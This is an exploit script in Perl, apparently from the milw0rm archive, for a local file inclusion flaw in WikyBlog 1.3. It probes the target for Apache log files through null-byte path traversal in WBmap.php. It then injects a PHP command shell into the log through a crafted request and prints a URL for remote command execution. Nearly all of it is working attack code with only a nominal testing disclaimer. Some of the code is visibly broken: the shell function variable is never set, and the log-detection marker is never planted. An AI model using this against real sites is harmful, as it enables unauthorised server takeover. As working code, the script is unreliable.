#################################################################################################
#                                    r0ut3r Presents...                                         #
#                                                                                               #
#                                Another r0ut3r discovery!                                      #
#                                  writ3r [at] gmail.com                                        #
#                                                                                               #
#                          WikyBlog Local File Inclusion Exploit                                #
#################################################################################################
# Software: WikyBlog 1.3                                                                        #
#                                                                                               #
# Vendor: http://www.wikyblog.com/                                                              #
#                                                                                               #
# Released: 2006/12/01                                                                          #
#                                                                                               #
# Discovered & Exploit By: r0ut3r (writ3r [at] gmail.com)                                       #
#                                                                                               #
# Note: The information provided in this document is for WikyBlog administrator                 #
# testing purposes only!                                                                        #
#                                                                                               #
# This exploit makes use of a local file inclusion exploit in                                   #
# WikyBlog to allow command execution. Firstly it locates an                                    #
# access_log, or error_log then it inserts a PHP Shell into                                     #
# the log file and returns a link for command execution.                                        #
#                                                                                               #
# include/WBmap.php?l=file_to_include%00                                                        #
# register_globals being on does not affect this vulnerability                                  #
#################################################################################################

use IO::Socket;
use Switch;

$port = "80"; # connection port
$target = @ARGV[0]; # localhost
$folder = @ARGV[1]; # /wikyblog/

sub Header()
{
        print q {#################################################################################################
#                                    r0ut3r Presents...                                         #
#                                                                                               #
#                                Another r0ut3r discovery!                                      #
#                                  writ3r [at] gmail.com                                        #
#                                                                                               #
#                          WikyBlog Local File Inclusion Exploit                                #
#################################################################################################
};
}

sub Usage()
{
        print q {Usage: wikyblogxpl1.3.pl [target] [folder]
Example: wikyblogxpl1.3.pl localhost /wikyblog/
};
        exit();
}

Header();

if (!$target || !$folder) {
        Usage(); }

# log list taken from Kacper's http://www.milw0rm.com/exploits/2253
@paths=(
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../../../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);

print "[+] Attempting to locate log file\n";
$log = "";
foreach $path (@paths)
{
        $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n";
        print $sock "GET ".$folder."include/WBmap.php?l=".$path."%00 HTTP/1.1\n";
        print $sock "Host: $target\n";
        print $sock "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
        print $sock "Accept: text/html\n";
        print $sock "Connection: close\n\n\r\n";

        #locate log file part taken from Kacper's http://www.milw0rm.com/exploits/2253
        $out = "";
        while ($answer = <$sock>) {
                $out.=$answer; }
        close($sock);
        if ($out =~ m/_exppl_(.*?)_exppl_/ms) {
                print "[+] Log file found! [".$path."] \n";
                $log = $path; }
}

if ($log eq "") {
print "[-] Log file not found. Exiting...\n"; exit(); }

print "[+] Inserting PHP Shell into logs\n";
$code = "<?php ob_clean(); echo ".$cmdfunct."(\$_GET['cmd']); die(); ?>";
$xpl = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n";
print $xpl "GET /".$code." HTTP/1.1\n";
print $xpl "Host: $target\n";
print $xpl "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
print $xpl "Accept: text/html\n";
print $xpl "Connection: close\n\n\r\n";
print "[+] Sent code...\n";

print "[!] Command execution at: ".$target.$folder."include/WBmap.php?l=".$log."%00";

# milw0rm.com [2006-12-01]